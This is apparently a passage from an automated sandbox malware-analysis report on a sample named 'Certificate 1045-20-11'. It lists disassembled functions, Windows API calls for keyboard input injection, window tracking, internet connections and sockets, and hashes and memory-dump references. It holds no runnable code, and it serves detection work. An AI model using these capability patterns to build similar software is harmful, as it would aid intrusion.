                                                                                • VariantClear.OLEAUT32(?), ref: 0089AD9D
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                                                • String ID:
                                                                                • API String ID: 780911581-0
                                                                                • Opcode ID: 060df6429ca9fb2359e0bc16d08be9d8e1d7a1dda4e2aae10adebf2bffa3fc0a
                                                                                • Instruction ID: 8750bd07485dba91c4e408afc87db8c057a27dae9c568b1bf9553a3b151fcd82
                                                                                • Opcode Fuzzy Hash: 060df6429ca9fb2359e0bc16d08be9d8e1d7a1dda4e2aae10adebf2bffa3fc0a
                                                                                • Instruction Fuzzy Hash: 41A126352047059FCB14EF18C495A1AB7E4FF89724F188859FA96DB3A2CB30ED44CB86
                                                                                Function 008791CC Relevance: 6.2, APIs: 4, Instructions: 201memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: Variant$AllocClearCopyInitString
                                                                                • String ID:
                                                                                • API String ID: 2808897238-0
                                                                                • Opcode ID: ac8da52bac6272f50c29275df535c848e219fd5a859d65112b736c210d296898
                                                                                • Instruction ID: f4c5cdb5401c49ce59773189818df0d2df7d0f175c89228008be2c1ee31a16f8
                                                                                • Opcode Fuzzy Hash: ac8da52bac6272f50c29275df535c848e219fd5a859d65112b736c210d296898
                                                                                • Instruction Fuzzy Hash: 6A518230600706DBDB24AF699895A2EB3A5FF45314B20D81FE59ECB3D6DB75D8808706
                                                                                Function 0086365B Relevance: 6.2, APIs: 4, Instructions: 162COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: _memset$__filbuf__getptd_noexit_memcpy_s
                                                                                • String ID:
                                                                                • API String ID: 3877424927-0
                                                                                • Opcode ID: 065ad613f1183b824f05baa70d3d15c8958660488bca00daffb81e2f860a9d07
                                                                                • Instruction ID: f6260eecc734d2e5d3a6da2448a0cbe49207cd44c22f5ce0c968f534f6568117
                                                                                • Opcode Fuzzy Hash: 065ad613f1183b824f05baa70d3d15c8958660488bca00daffb81e2f860a9d07
                                                                                • Instruction Fuzzy Hash: 5E51A3B4A0030AABDB248F69C8846AE77A5FF50324F268739F825D72D0DB719F509B51
                                                                                Function 008AC4D7 Relevance: 6.1, APIs: 4, Instructions: 137COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetWindowRect.USER32(00C86880,?), ref: 008AC544
                                                                                • ScreenToClient.USER32(?,00000002), ref: 008AC574
                                                                                • MoveWindow.USER32(00000002,?,?,?,000000FF,00000001,?,00000002,?,?,?,00000002,?,?), ref: 008AC5DA
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: Window$ClientMoveRectScreen
                                                                                • String ID:
                                                                                • API String ID: 3880355969-0
                                                                                • Opcode ID: 08ae0b6952f362f1c742963af97166a72fe5ca0ddfd2199a9e01692abc503e02
                                                                                • Instruction ID: 1a16cb6b950d69c00bc9ea0bc7e80118224ba7e0a7d7daf0333ecada4ee74c39
                                                                                • Opcode Fuzzy Hash: 08ae0b6952f362f1c742963af97166a72fe5ca0ddfd2199a9e01692abc503e02
                                                                                • Instruction Fuzzy Hash: E8514C75A00208EFDF20DF68C880AAE7BB5FB56324F108659F965DB690D730ED41DB90
                                                                                Function 0087C410 Relevance: 6.1, APIs: 4, Instructions: 130windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 0087C462
                                                                                • __itow.LIBCMT ref: 0087C49C
                                                                                  • Part of subcall function 0087C6E8: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 0087C753
                                                                                • SendMessageW.USER32(?,0000110A,00000001,?), ref: 0087C505
                                                                                • __itow.LIBCMT ref: 0087C55A
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend$__itow
                                                                                • String ID:
                                                                                • API String ID: 3379773720-0
                                                                                • Opcode ID: e3b784d6df4dfa530dc6d9bb029f96f31ec372d5d7748a170b2fe0ac320920ad
                                                                                • Instruction ID: 448f38ee6755ed807f29e4fb9f73476104e5aeec4b65715917a8c5b72e84c17d
                                                                                • Opcode Fuzzy Hash: e3b784d6df4dfa530dc6d9bb029f96f31ec372d5d7748a170b2fe0ac320920ad
                                                                                • Instruction Fuzzy Hash: 3F419371A0020CABDF11EF58C855BEE7BB9FF49704F004019FA09E7292DB71DA458BA2
                                                                                Function 0088390C Relevance: 6.1, APIs: 4, Instructions: 112keyboardwindowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00883966
                                                                                • SetKeyboardState.USER32(00000080,?,00000001), ref: 00883982
                                                                                • PostMessageW.USER32(00000000,00000102,?,00000001), ref: 008839EF
                                                                                • SendInput.USER32(00000001,?,0000001C,00000000,?,00000001), ref: 00883A4D
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: KeyboardState$InputMessagePostSend
                                                                                • String ID:
                                                                                • API String ID: 432972143-0
                                                                                • Opcode ID: ef712f081e90a79a34ffc29fd5bc6238ecf1ed138938af20a1e008b37bf5751d
                                                                                • Instruction ID: 71d5a8a7953adf90e52ee58fac1ff88e5bd97d5fb9fc3641bf7c5a7a0e2360ff
                                                                                • Opcode Fuzzy Hash: ef712f081e90a79a34ffc29fd5bc6238ecf1ed138938af20a1e008b37bf5751d
                                                                                • Instruction Fuzzy Hash: 95410470A04218AAEF20AB68CC05BFDBFB9FB56710F04011AE4C1D22C2C7B48E85D765
                                                                                Function 0088E698 Relevance: 6.1, APIs: 4, Instructions: 110fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 0088E742
                                                                                • GetLastError.KERNEL32(?,00000000), ref: 0088E768
                                                                                • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 0088E78D
                                                                                • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 0088E7B9
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                • String ID:
                                                                                • API String ID: 3321077145-0
                                                                                • Opcode ID: 6c0d57377672d0d16293daf113e257b7e8314def22023026c60284c87184e243
                                                                                • Instruction ID: f1fd3d97e59954c4cd70c313db5798fd33d657ee3e4ba0d24d71bb039523eee7
                                                                                • Opcode Fuzzy Hash: 6c0d57377672d0d16293daf113e257b7e8314def22023026c60284c87184e243
                                                                                • Instruction Fuzzy Hash: BA411639600614DFCF21EF19C44494DBBE5FF9A710B198498E986AB3A2CB74FD00CB92
                                                                                Function 008AB544 Relevance: 6.1, APIs: 4, Instructions: 108COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 008AB5D1
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: InvalidateRect
                                                                                • String ID:
                                                                                • API String ID: 634782764-0
                                                                                • Opcode ID: f07f6547c1f382ad29d768c582e7c3de016f64e6e053c677b9f55113a40e58db
                                                                                • Instruction ID: cf15cc77c321425d1d8d995ebde58c08d1845eec4ad3eaa687b2144440b6a258
                                                                                • Opcode Fuzzy Hash: f07f6547c1f382ad29d768c582e7c3de016f64e6e053c677b9f55113a40e58db
                                                                                • Instruction Fuzzy Hash: 6E31BE74A01208AFFB249F58CC85FA87BA5FB17314F544211FA51D7AE3C770A9509B52
                                                                                Function 008AD7DE Relevance: 6.1, APIs: 4, Instructions: 105windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • ClientToScreen.USER32(?,?), ref: 008AD807
                                                                                • GetWindowRect.USER32(?,?), ref: 008AD87D
                                                                                • PtInRect.USER32(?,?,008AED5A), ref: 008AD88D
                                                                                • MessageBeep.USER32(00000000), ref: 008AD8FE
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: Rect$BeepClientMessageScreenWindow
                                                                                • String ID:
                                                                                • API String ID: 1352109105-0
                                                                                • Opcode ID: 7ee2491aa9489c0fe6d89792dc3f20b18b24b3596bf844affef704036ce1f3ea
                                                                                • Instruction ID: a36bbc68d47a06fbf4ffb489541bb24fe4e6ed3eb2ff3c4dc233a08aa4f4802a
                                                                                • Opcode Fuzzy Hash: 7ee2491aa9489c0fe6d89792dc3f20b18b24b3596bf844affef704036ce1f3ea
                                                                                • Instruction Fuzzy Hash: D5419A70A00319DFEB11DF58C884BA97BF5FB4A315F1885B9E916CBA60D338E941CB40
                                                                                Function 00883A61 Relevance: 6.1, APIs: 4, Instructions: 104keyboardwindowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 00883AB8
                                                                                • SetKeyboardState.USER32(00000080,?,00008000), ref: 00883AD4
                                                                                • PostMessageW.USER32(00000000,00000101,00000000,?), ref: 00883B34
                                                                                • SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 00883B92
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: KeyboardState$InputMessagePostSend
                                                                                • String ID:
                                                                                • API String ID: 432972143-0
                                                                                • Opcode ID: 0e0d869aaa6d4f2259e4c285957aff6fd4a3528fbe0bcb682c54376bbcdbe96b
                                                                                • Instruction ID: 655ec0a5ecdd311b1254c8759ef3aa7e6c20cc06578da464ba98911ee3d181cc
                                                                                • Opcode Fuzzy Hash: 0e0d869aaa6d4f2259e4c285957aff6fd4a3528fbe0bcb682c54376bbcdbe96b
                                                                                • Instruction Fuzzy Hash: 183104B0A00258AEEF20BB68C819BFE7BB6FB55720F04015AE481E32D1C7748F45C766
                                                                                Function 00874004 Relevance: 6.1, APIs: 4, Instructions: 96COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00874038
                                                                                • __isleadbyte_l.LIBCMT ref: 00874066
                                                                                • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 00874094
                                                                                • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 008740CA
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                • String ID:
                                                                                • API String ID: 3058430110-0
                                                                                • Opcode ID: 9a547b01c2de42d66cf3334011b85387008954adbbe8aa77ca70564b27f2233a
                                                                                • Instruction ID: 879ee8dcf4b44e6ef8da457ac3d9bd746f0a9c52bcb6b868eb88f1731a1eed5b
                                                                                • Opcode Fuzzy Hash: 9a547b01c2de42d66cf3334011b85387008954adbbe8aa77ca70564b27f2233a
                                                                                • Instruction Fuzzy Hash: D431D031600A16AFDB61DF34C844BBA7BB5FF40310F199029E669CB1A4E731D890DB90
                                                                                Function 008A7CA5 Relevance: 6.1, APIs: 4, Instructions: 93COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetForegroundWindow.USER32 ref: 008A7CB9
                                                                                  • Part of subcall function 00885F55: GetWindowThreadProcessId.USER32(?,00000000), ref: 00885F6F
                                                                                  • Part of subcall function 00885F55: GetCurrentThreadId.KERNEL32 ref: 00885F76
                                                                                  • Part of subcall function 00885F55: AttachThreadInput.USER32(00000000,?,0088781F), ref: 00885F7D
                                                                                • GetCaretPos.USER32(?), ref: 008A7CCA
                                                                                • ClientToScreen.USER32(00000000,?), ref: 008A7D03
                                                                                • GetForegroundWindow.USER32 ref: 008A7D09
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                • String ID:
                                                                                • API String ID: 2759813231-0
                                                                                • Opcode ID: 9d21516722d467ff1bad7613838ab2b4df220263b478acc36a5e5a3aefcb306e
                                                                                • Instruction ID: 708670cf08b1cfb746a2ed7bb0cb6fa8571eedd773a838713e59c843440306c9
                                                                                • Opcode Fuzzy Hash: 9d21516722d467ff1bad7613838ab2b4df220263b478acc36a5e5a3aefcb306e
                                                                                • Instruction Fuzzy Hash: 70311E71900108AFDB00EFA9CC459EFBBF9FF55314B108466E915E3211DA319E058BA1
                                                                                Function 008AF1D7 Relevance: 6.1, APIs: 4, Instructions: 80windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 0085B34E: GetWindowLongW.USER32(?,000000EB), ref: 0085B35F
                                                                                • GetCursorPos.USER32(?), ref: 008AF211
                                                                                • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,008BE4C0,?,?,?,?,?), ref: 008AF226
                                                                                • GetCursorPos.USER32(?), ref: 008AF270
                                                                                • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,008BE4C0,?,?,?), ref: 008AF2A6
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                                • String ID:
                                                                                • API String ID: 2864067406-0
                                                                                • Opcode ID: 5faf36e95ae1ecc59539883011a708671ecc39a0a9c505237644a53094d26876
                                                                                • Instruction ID: bbe08f1410a29765ebc7742fe79f74f84b8be67c576d95c01652c15c969a3ed7
                                                                                • Opcode Fuzzy Hash: 5faf36e95ae1ecc59539883011a708671ecc39a0a9c505237644a53094d26876
                                                                                • Instruction Fuzzy Hash: 30219139500518AFDB259F94CC98EFE7BB9FF4A710F048069FA09876A2D3319D51DB50
                                                                                Function 0089431C Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00894358
                                                                                  • Part of subcall function 008943E2: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00894401
                                                                                  • Part of subcall function 008943E2: InternetCloseHandle.WININET(00000000), ref: 0089449E
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: Internet$CloseConnectHandleOpen
                                                                                • String ID:
                                                                                • API String ID: 1463438336-0
                                                                                • Opcode ID: bef6240f3310d04461437205a91b0d2374e2d1b77bc11d46fe5c96af9d7c7f6e
                                                                                • Instruction ID: abd91e2bc281ce06313c532f43c1e9b0dabb3f9d78a7330d04dd445db3ae3d0a
                                                                                • Opcode Fuzzy Hash: bef6240f3310d04461437205a91b0d2374e2d1b77bc11d46fe5c96af9d7c7f6e
                                                                                • Instruction Fuzzy Hash: 3521A131200B05BFEF16AF749C00FBBB7B9FF44715F18501ABA15D6A50DB719822A791
                                                                                Function 008A8A37 Relevance: 6.1, APIs: 4, Instructions: 69COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetWindowLongW.USER32(?,000000EC), ref: 008A8AA6
                                                                                • SetWindowLongW.USER32(?,000000EC,00000000), ref: 008A8AC0
                                                                                • SetWindowLongW.USER32(?,000000EC,00000000), ref: 008A8ACE
                                                                                • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 008A8ADC
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: Window$Long$AttributesLayered
                                                                                • String ID:
                                                                                • API String ID: 2169480361-0
                                                                                • Opcode ID: 19de5b7a7dd1d63f8abf12a10e9674895e168379db97875ffa7f1adffd9cb212
                                                                                • Instruction ID: e949a4e9841a3d069a42c13bc3b6313049e2d642838fa04bc5ed34d18eac788a
                                                                                • Opcode Fuzzy Hash: 19de5b7a7dd1d63f8abf12a10e9674895e168379db97875ffa7f1adffd9cb212
                                                                                • Instruction Fuzzy Hash: 6E118E31245625AFEB04AB18CC05FBA77A9FF86321F144519F916C72E2DBB0BD0087A6
                                                                                Function 00898A7F Relevance: 6.1, APIs: 4, Instructions: 69networkCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • select.WSOCK32(00000000,00000001,00000000,00000000,?), ref: 00898AE0
                                                                                • __WSAFDIsSet.WSOCK32(00000000,00000001), ref: 00898AF2
                                                                                • accept.WSOCK32(00000000,00000000,00000000), ref: 00898AFF
                                                                                • WSAGetLastError.WSOCK32(00000000), ref: 00898B16
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorLastacceptselect
                                                                                • String ID:
                                                                                • API String ID: 385091864-0
                                                                                • Opcode ID: cb63b934232d6c536da32af7a8785f625a347d31789ac45ea1a5e516db88f9ae
